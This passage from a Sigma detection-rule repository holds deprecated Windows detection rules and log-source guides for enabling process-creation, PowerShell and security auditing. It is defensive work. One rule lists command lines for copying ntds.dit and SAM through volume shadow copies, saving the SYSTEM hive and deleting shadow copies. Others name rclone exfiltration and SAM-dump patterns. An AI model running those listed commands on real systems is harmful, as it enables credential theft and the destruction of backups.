- https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf
- https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634
author: Alexandr Yampolskyi, SOC Prime
date: 2019/03/26
modified: 2023/04/26
# tags:
# - CSC4
# - CSC4.8
# - NIST CSF 1.1 PR.AC-4
# - NIST CSF 1.1 PR.AT-2
# - NIST CSF 1.1 PR.MA-2
# - NIST CSF 1.1 PR.PT-3
# - ISO 27002-2013 A.9.1.1
# - ISO 27002-2013 A.9.2.2
# - ISO 27002-2013 A.9.2.3
# - ISO 27002-2013 A.9.2.4
# - ISO 27002-2013 A.9.2.5
# - ISO 27002-2013 A.9.2.6
# - ISO 27002-2013 A.9.3.1
# - ISO 27002-2013 A.9.4.1
# - ISO 27002-2013 A.9.4.2
# - ISO 27002-2013 A.9.4.3
# - ISO 27002-2013 A.9.4.4
# - PCI DSS 3.2 2.1
# - PCI DSS 3.2 7.1
# - PCI DSS 3.2 7.2
# - PCI DSS 3.2 7.3
# - PCI DSS 3.2 8.1
# - PCI DSS 3.2 8.2
# - PCI DSS 3.2 8.3
# - PCI DSS 3.2 8.7
logsource:
product: windows
service: security
detection:
selection:
EventID:
- 4728 # A member was added to a security-enabled global group
- 4729 # A member was removed from a security-enabled global group
- 4730 # A security-enabled global group was deleted
- 633 # Security Enabled Global Group Member Removed
- 632 # Security Enabled Global Group Member Added
- 634 # Security Enabled Global Group Deleted
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: deprecated/windows/win_security_lolbas_execution_of_nltest.yml
================================================
title: Correct Execution of Nltest.exe
id: eeb66bbb-3dde-4582-815a-584aee9fe6d1
status: deprecated
description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
references:
- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm
- https://attack.mitre.org/software/S0359/
author: Arun Chauhan
date: 2021/10/04
modified: 2023/02/02
tags:
- attack.discovery
- attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts
- attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc
- attack.t1016 # enumerate the parent domain of a local machine using /parentdomain
logsource:
product: windows
service: security
detection:
selection:
EventID: 4689
ProcessName|endswith: 'nltest.exe'
Status: '0x0'
condition: selection
fields:
- 'SubjectUserName'
- 'SubjectDomainName'
falsepositives:
- Red team activity
- Rare legitimate use by an administrator
level: high
================================================
FILE: deprecated/windows/win_security_windows_defender_exclusions_write_deleted.yml
================================================
title: Windows Defender Exclusion Deleted
id: a33f8808-2812-4373-ae95-8cfb82134978
related:
- id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d
type: derived
- id: 46a68649-f218-4f86-aea1-16a759d81820
type: derived
status: deprecated
description: |
Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions
references:
- https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
author: '@BarryShooshooga'
date: 2019-10-26
modified: 2025-01-30
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: windows
service: security
definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'
detection:
selection:
EventID: 4660 # An object was deleted.
ObjectName|contains: '\Microsoft\Windows Defender\Exclusions\'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/win_susp_esentutl_activity.yml
================================================
title: Suspicious Esentutl Use
id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7
status: deprecated
description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
author: Florian Roth (Nextron Systems)
date: 2020/05/23
modified: 2022/04/11
references:
- https://lolbas-project.github.io/
- https://twitter.com/chadtilbury/status/1264226341408452610
tags:
- attack.defense_evasion
- attack.execution
- attack.s0404
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- ' /vss '
- ' /y '
condition: selection
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- Administrative activity
level: high
================================================
FILE: deprecated/windows/win_susp_rclone_exec.yml
================================================
title: Rclone Execution via Command Line or PowerShell
id: cb7286ba-f207-44ab-b9e6-760d82b84253
description: Detects Rclone which is commonly used by ransomware groups for exfiltration
status: deprecated
date: 2021/05/26
modified: 2022/04/11
author: Aaron Greetham (@beardofbinary) - NCC Group
references:
- https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
tags:
- attack.exfiltration
- attack.t1567.002
falsepositives:
- Legitimate Rclone usage (rare)
level: high
logsource:
product: windows
category: process_creation
detection:
exec_selection:
Image|endswith: '\rclone.exe'
ParentImage|endswith:
- '\PowerShell.exe'
- '\cmd.exe'
command_selection:
CommandLine|contains:
- ' pass '
- ' user '
- ' copy '
- ' mega '
- ' sync '
- ' config '
- ' lsd '
- ' remote '
- ' ls '
description_selection:
Description: 'Rsync for cloud storage'
condition: command_selection and ( description_selection or exec_selection )
================================================
FILE: deprecated/windows/win_susp_vssadmin_ntds_activity.yml
================================================
title: Activity Related to NTDS.dit Domain Hash Retrieval
id: b932b60f-fdda-4d53-8eda-a170c1d97bbd
status: deprecated
description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
author: Florian Roth (Nextron Systems), Michael Haag
date: 2019/01/16
modified: 2022/04/11
references:
- https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/
- https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/
- https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/
- https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
tags:
- attack.credential_access
- attack.t1003
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine:
- 'vssadmin.exe Delete Shadows'
- 'vssadmin create shadow /for=C:'
- 'copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit'
- 'copy \\?\GLOBALROOT\Device\\*\config\SAM'
- 'vssadmin delete shadows /for=C:'
- 'reg SAVE HKLM\SYSTEM '
- 'esentutl.exe /y /vss *\ntds.dit*'
- 'esentutl.exe /y /vss *\SAM'
- 'esentutl.exe /y /vss *\SYSTEM'
condition: selection
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- Administrative activity
level: high
================================================
FILE: deprecated/windows/win_system_service_install_susp_double_ampersand.yml
================================================
title: New Service Uses Double Ampersand in Path
id: ca83e9f3-657a-45d0-88d6-c1ac280caf53
status: deprecated
description: Detects a service installation that uses a suspicious double ampersand used in the image path value
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2022/07/05
modified: 2023/11/15
tags:
- attack.defense_evasion
- attack.t1027
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ImagePath|contains: '&&'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/win_system_susp_sam_dump.yml
================================================
title: SAM Dump to AppData
id: 839dd1e8-eda8-4834-8145-01beeee33acd
status: deprecated
description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers
author: Florian Roth (Nextron Systems)
date: 2018/01/27
modified: 2024/01/18
tags:
- attack.credential_access
- attack.t1003.002
logsource:
product: windows
service: system
definition: The source of this type of event is Kernel-General
detection:
selection:
Provider_Name: Microsoft-Windows-Kernel-General
EventID: 16
keywords:
'|all':
- '\AppData\Local\Temp\SAM-'
- '.dmp'
condition: selection and keywords
falsepositives:
- Unknown
level: high
================================================
FILE: documentation/README.md
================================================
================================================
FILE: documentation/logsource-guides/other/antivirus.md
================================================
**Coming Soon**
================================================
FILE: documentation/logsource-guides/windows/category/process_creation.md
================================================
# category: process_creation
ID: 2ff912e8-159f-4789-a2ef-761292b32a23
## Content
Expand
- [category: process\_creation](#category-process_creation)
- [Content](#content)
- [Description](#description)
- [Event Source(s)](#event-sources)
- [Logging Setup](#logging-setup)
- [Microsoft Windows Security Auditing](#microsoft-windows-security-auditing)
- [Process Creation](#process-creation)
- [Include Command-Line In Process Creation Events](#include-command-line-in-process-creation-events)
- [Microsoft-Windows-Sysmon](#microsoft-windows-sysmon)
- [Process Creation](#process-creation-1)
- [Event Fields](#event-fields)
- [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688)
- [Provider: Microsoft-Windows-Sysmon / EventID: 1](#provider-microsoft-windows-sysmon--eventid-1)
## Description
This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `process_creation` category.
## Event Source(s)
This section describes the event source(s) that are required to be collected in order to receive the events used by the `process_creation` category detection rules
```yml
Provider: Microsoft Windows Security Auditing
GUID: {54849625-5478-4994-a5ba-3e3b0328c30d}
Channel: Security
EventID: 4688
```
```yml
Provider: Microsoft-Windows-Sysmon
GUID: {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Channel: Microsoft-Windows-Sysmon/Operational
EventID: 1
```
## Logging Setup
This section describes how to setup logging in your environment
### Microsoft Windows Security Auditing
#### Process Creation
- Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- EventID(s):
- `4688`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Detailed Tracking
- Audit Process Creation
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation)
#### Include Command-Line In Process Creation Events
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Administrative Templates
- System
- Audit Process Creation
- Include Command Line In Process Creation Events
```
### Microsoft-Windows-Sysmon
#### Process Creation
- Provider: `Microsoft-Windows-Sysmon`
- Channel: `Microsoft-Windows-Sysmon/Operational`
- Event Volume: `High`
- EventID(s):
- `1`
To configure Sysmon process creation events you can follow the instructions below
- Download [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)
- Install Sysmon using an appropriate configuration. The configuration must include a `` element. We recommend the following configuration [sysmonconfig-export.xml](https://github.com/Neo23x0/sysmon-config/blob/master/sysmonconfig-export.xml).
```powershell
sysmon -i /path/to/config
```
## Event Fields
> **Note**
>
> For rules using this category in SIGMA. Know that there is a mapping between `Sysmon EID 1` fields and `Microsoft Windows Security Auditing EID: 4688`. While you can use the fields of `EID 4688` it's best to use the Sysmon ones.
### Provider: Microsoft Windows Security Auditing / EventID: 4688
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- NewProcessId
- NewProcessName
- TokenElevationType
- ProcessId
- CommandLine
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- ParentProcessName
- MandatoryLabel
```
### Provider: Microsoft-Windows-Sysmon / EventID: 1
Expand
```yml
- RuleName
- UtcTime
- ProcessGuid
- ProcessId
- Image
- FileVersion
- Description
- Product
- Company
- OriginalFileName
- CommandLine
- CurrentDirectory
- User
- LogonGuid
- LogonId
- TerminalSessionId
- IntegrityLevel
- Hashes
- ParentProcessGuid
- ParentProcessId
- ParentImage
- ParentCommandLine
- ParentUser
```
================================================
FILE: documentation/logsource-guides/windows/category/ps_module.md
================================================
# category: ps_module
ID: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
## Content
Expand
- [category: ps\_module](#category-ps_module)
- [Content](#content)
- [Description](#description)
- [Event Source(s)](#event-sources)
- [PowerShell 5](#powershell-5)
- [PowerShell 7](#powershell-7)
- [Logging Setup](#logging-setup)
- [Microsoft-Windows-PowerShell](#microsoft-windows-powershell)
- [Provider: PowerShellCore](#provider-powershellcore)
- [Event Fields](#event-fields)
- [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5)
- [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)
## Description
This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_module` category.
## Event Source(s)
### PowerShell 5
```yml
Provider: Microsoft-Windows-PowerShell
GUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a}
Channel: Microsoft-Windows-PowerShell/Operational
EventID: 4103
```
### PowerShell 7
```yml
Provider: PowerShellCore
GUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2}
Channel: PowerShellCore/Operational
EventID: 4103
```
## Logging Setup
### Microsoft-Windows-PowerShell
- Event Volume: TBD
- EventID(s):
- `4103`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Administrative Templates
- Windows Components
- Windows PowerShell
- Turn On Module Logging
- Select List Of Modules According To Your Audit Policy (or use '*' to select all modules)
```
### Provider: PowerShellCore
- Event Volume: TBD
- EventID(s):
- `4103`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Administrative Templates
- PowerShell Core
- Turn On Module Logging
- Select List Of Modules According To Your Audit Policy (or use '*' to select all modules)
```
> **Note**
>
> By default when you install PowerShell 7 the logging template isn't available. You can install it by using the PowerShell script available in the installation directory `InstallPSCorePolicyDefinitions.ps1`
## Event Fields
### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)
Expand
```yml
- ContextInfo
- UserData
- Payload
```
### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)
Expand
```yml
- ContextInfo
- UserData
- Payload
```
================================================
FILE: documentation/logsource-guides/windows/category/ps_script.md
================================================
# category: ps_script
ID: bade5735-5ab0-4aa7-a642-a11be0e40872
## Content
Expand
- [category: ps\_script](#category-ps_script)
- [Content](#content)
- [Description](#description)
- [Event Source(s)](#event-sources)
- [PowerShell 5](#powershell-5)
- [PowerShell 7](#powershell-7)
- [Logging Setup](#logging-setup)
- [Provider: Microsoft-Windows-PowerShell](#provider-microsoft-windows-powershell)
- [Provider: PowerShellCore](#provider-powershellcore)
- [Event Fields](#event-fields)
- [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5)
- [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)
## Description
This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_script` category.
## Event Source(s)
### PowerShell 5
```yml
Provider: Microsoft-Windows-PowerShell
GUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a}
Channel: Microsoft-Windows-PowerShell/Operational
EventID: 4104
```
### PowerShell 7
```yml
Provider: PowerShellCore
GUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2}
Channel: PowerShellCore/Operational
EventID: 4104
```
## Logging Setup
### Provider: Microsoft-Windows-PowerShell
- Event Volume: TBD
- EventID(s):
- `4104`
```yml
- Computer Configuration
- Administrative Templates
- Windows Components
- Windows PowerShell
- Turn On PowerShell Script Block Logging
```
### Provider: PowerShellCore
- Event Volume: TBD
- EventID(s):
- `4104`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Administrative Templates
- PowerShell Core
- Turn On PowerShell Script Block Logging
```
> **Note**
>
> By default when you install PowerShell 7 the logging template isn't available. You can install it by using the PowerShell script available in the installation directory `InstallPSCorePolicyDefinitions.ps1`
## Event Fields
### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)
Expand
```yml
- MessageNumber
- MessageTotal
- ScriptBlockText
- ScriptBlockId
- Path
```
### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)
Expand
```yml
- MessageNumber
- MessageTotal
- ScriptBlockText
- ScriptBlockId
- Path
```
================================================
FILE: documentation/logsource-guides/windows/category/registry_add.md
================================================
**Coming Soon**
================================================
FILE: documentation/logsource-guides/windows/category/registry_delete.md
================================================
**Coming Soon**
================================================
FILE: documentation/logsource-guides/windows/category/registry_event.md
================================================
**Coming Soon**
================================================
FILE: documentation/logsource-guides/windows/category/registry_rename.md
================================================
**Coming Soon**
================================================
FILE: documentation/logsource-guides/windows/category/registry_set.md
================================================
**Coming Soon**
================================================
FILE: documentation/logsource-guides/windows/service/powershell.md
================================================
**Coming Soon**
================================================
FILE: documentation/logsource-guides/windows/service/security.md
================================================
# service: security
ID: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64
## Content
Details
- [service: security](#service-security)
- [Content](#content)
- [Description](#description)
- [Event Source(s)](#event-sources)
- [Logging Setup](#logging-setup)
- [Account Logon](#account-logon)
- [Credential Validation](#credential-validation)
- [Kerberos Authentication Service](#kerberos-authentication-service)
- [Kerberos Service Ticket Operations](#kerberos-service-ticket-operations)
- [Other Account Logon Events](#other-account-logon-events)
- [Account Management](#account-management)
- [Application Group Management](#application-group-management)
- [Computer Account Management](#computer-account-management)
- [Distribution Group Management](#distribution-group-management)
- [Other Account Management Events](#other-account-management-events)
- [Security Group Management](#security-group-management)
- [User Account Management](#user-account-management)
- [Detailed Tracking](#detailed-tracking)
- [DPAPI Activity](#dpapi-activity)
- [PNP Activity](#pnp-activity)
- [Process Creation](#process-creation)
- [Process Termination](#process-termination)
- [RPC Events](#rpc-events)
- [Token Right Adjusted](#token-right-adjusted)
- [DS Access](#ds-access)
- [Detailed Directory Service Replication](#detailed-directory-service-replication)
- [Directory Service Access](#directory-service-access)
- [Directory Service Changes](#directory-service-changes)
- [Directory Service Replication](#directory-service-replication)
- [Logon/Logoff](#logonlogoff)
- [Account Lockout](#account-lockout)
- [User/Device Claims](#userdevice-claims)
- [Group Membership](#group-membership)
- [IPsec Extended Mode](#ipsec-extended-mode)
- [IPsec Main Mode](#ipsec-main-mode)
- [IPsec Quick Mode](#ipsec-quick-mode)
- [Logoff](#logoff)
- [Logon](#logon)
- [Network Policy Server](#network-policy-server)
- [Other Logon/Logoff Events](#other-logonlogoff-events)
- [Special Logon](#special-logon)
- [Object Access](#object-access)
- [Application Generated](#application-generated)
- [Certification Services](#certification-services)
- [Detailed File Share](#detailed-file-share)
- [File Share](#file-share)
- [File System](#file-system)
- [Filtering Platform Connection](#filtering-platform-connection)
- [Filtering Platform Packet Drop](#filtering-platform-packet-drop)
- [Handle Manipulation](#handle-manipulation)
- [Kernel Object](#kernel-object)
- [Other Object Access Events](#other-object-access-events)
- [Registry](#registry)
- [Removable Storage](#removable-storage)
- [SAM](#sam)
- [Central Access Policy Staging](#central-access-policy-staging)
- [Policy Change](#policy-change)
- [Audit Policy Change](#audit-policy-change)
- [Authentication Policy Change](#authentication-policy-change)
- [Authorization Policy Change](#authorization-policy-change)
- [Filtering Platform Policy Change](#filtering-platform-policy-change)
- [MPSSVC Rule-Level Policy Change](#mpssvc-rule-level-policy-change)
- [Other Policy Change Events](#other-policy-change-events)
- [Privilege Use](#privilege-use)
- [Non Sensitive Privilege Use](#non-sensitive-privilege-use)
- [Other Privilege Use Events](#other-privilege-use-events)
- [Sensitive Privilege Use](#sensitive-privilege-use)
- [System](#system)
- [IPsec Driver](#ipsec-driver)
- [Other System Events](#other-system-events)
- [Security State Change](#security-state-change)
- [Security System Extension](#security-system-extension)
- [System Integrity](#system-integrity)
- [Global Object Access Auditing](#global-object-access-auditing)
- [Full Event(s) List](#full-events-list)
- [Event Fields](#event-fields)
- [Provider: Microsoft Windows Security Auditing / EventID: 4624](#provider-microsoft-windows-security-auditing--eventid-4624)
- [Provider: Microsoft Windows Security Auditing / EventID: 4627](#provider-microsoft-windows-security-auditing--eventid-4627)
- [Provider: Microsoft Windows Security Auditing / EventID: 4663](#provider-microsoft-windows-security-auditing--eventid-4663)
- [Provider: Microsoft Windows Security Auditing / EventID: 4670](#provider-microsoft-windows-security-auditing--eventid-4670)
- [Provider: Microsoft Windows Security Auditing / EventID: 4672](#provider-microsoft-windows-security-auditing--eventid-4672)
- [Provider: Microsoft Windows Security Auditing / EventID: 4673](#provider-microsoft-windows-security-auditing--eventid-4673)
- [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688)
- [Provider: Microsoft Windows Security Auditing / EventID: 4689](#provider-microsoft-windows-security-auditing--eventid-4689)
- [Provider: Microsoft Windows Security Auditing / EventID: 4702](#provider-microsoft-windows-security-auditing--eventid-4702)
- [Provider: Microsoft Windows Security Auditing / EventID: 4703](#provider-microsoft-windows-security-auditing--eventid-4703)
- [Provider: Microsoft Windows Security Auditing / EventID: 4957](#provider-microsoft-windows-security-auditing--eventid-4957)
- [Provider: Microsoft Windows Security Auditing / EventID: 5447](#provider-microsoft-windows-security-auditing--eventid-5447)
## Description
This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `security` service.
## Event Source(s)
```yml
Provider: Microsoft Windows Security Auditing
GUID: {54849625-5478-4994-a5ba-3e3b0328c30d}
Channel: Security
```
## Logging Setup
### Account Logon
#### Credential Validation
- Subcategory GUID: `{0CCE923F-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4774`
- `4775`
- `4776`
- `4777`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Logon
- Audit Credential Validation
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-credential-validation)
#### Kerberos Authentication Service
- Subcategory GUID: `{0CCE9242-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High on Kerberos Key Distribution Center servers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4768`
- `4771`
- `4772`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Logon
- Audit Kerberos Authentication Service
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-authentication-service)
#### Kerberos Service Ticket Operations
- Subcategory GUID: `{0CCE9240-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Very High on Kerberos Key Distribution Center servers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4769`
- `4770`
- `4773`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Logon
- Audit Kerberos Service Ticket Operations
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-service-ticket-operations)
#### Other Account Logon Events
- Subcategory GUID: `{0CCE9241-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- TBD
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Logon
- Audit Other Account Logon Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-logon-events)
### Account Management
#### Application Group Management
- Subcategory GUID: `{0CCE9239-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4783`
- `4784`
- `4785`
- `4786`
- `4787`
- `4788`
- `4789`
- `4790`
- `4791`
- `4792`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Management
- Audit Application Group Management
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-group-management)
#### Computer Account Management
- Subcategory GUID: `{0CCE9236-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low on domain controllers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4741`
- `4742`
- `4743`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Management
- Audit Computer Account Management
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-computer-account-management)
#### Distribution Group Management
- Subcategory GUID: `{0CCE9238-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low on Domain Controllers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4749`
- `4750`
- `4751`
- `4752`
- `4753`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Management
- Audit Distribution Group Management
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-distribution-group-management)
#### Other Account Management Events
- Subcategory GUID: `{0CCE923A-69AE-11D9-BED3-505054503030}`
